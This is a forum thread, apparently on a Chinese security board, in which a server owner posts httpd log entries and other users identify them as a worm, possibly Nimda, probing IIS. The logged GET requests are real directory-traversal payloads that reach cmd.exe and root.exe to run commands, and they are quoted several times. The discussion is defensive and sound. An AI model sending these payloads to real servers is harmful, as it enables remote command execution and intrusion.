k*n
2 楼
有个IP不停的向我的server发这样的信号:
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等.
(从httpd log里看见的)
"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
等等等等.
m*n
3 楼
别去
w*n
4 楼
Yes, it might be a tool or worm though...
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
p*r
5 楼
是,正在寻找IIS Web Server的漏洞
HTTP/1.0"
【在 w*****n 的大作中提到】
:
: Yes, it might be a tool or worm though...
HTTP/1.0"
【在 w*****n 的大作中提到】
:
: Yes, it might be a tool or worm though...
M*t
6 楼
that server was infected by Nimda...
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
M*t
7 楼
看看有没有200啊?
看看你的C盘被共享了吗?
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
看看你的C盘被共享了吗?
【在 k**n 的大作中提到】
: 有个IP不停的向我的server发这样的信号:
: (从httpd log里看见的)
: "GET /scripts/root.exe?/c+dir HTTP/1.0"
: "GET /MSADC/root.exe?/c+dir HTTP/1.0"
: "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
: "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
相关阅读
combofix.exe 清除 google redirect遭遇故障window xp login setting这是中毒还是flash的bug?有没有好的加密软件推荐!!谢谢弱问:vista网络安全类型咋改不了呢?担心网站密码泄露的 (转载)借人气请教:HP笔记本恢复出厂设置会覆盖掉自己分区(D盘)里的个人文件吗?谢谢!求可用的破解版数据恢复软件,谢谢病毒https求PDF解密 (转载)seaget external硬盘的密码忘了hotmail邮箱每天一大堆垃圾邮件,怎么办?請教如何調查不明原因的巨量下載急问:Toshiba的新电脑用ADDS分区后彻底瘫痪如何建立vpn服务器?dropbox会不会对主机的数据安全造成威胁?Virus Delete Firefox, Help!! ThanksHow to start DOS mode in win 7 machine?小笼包子求助:家有小孩痴迷上网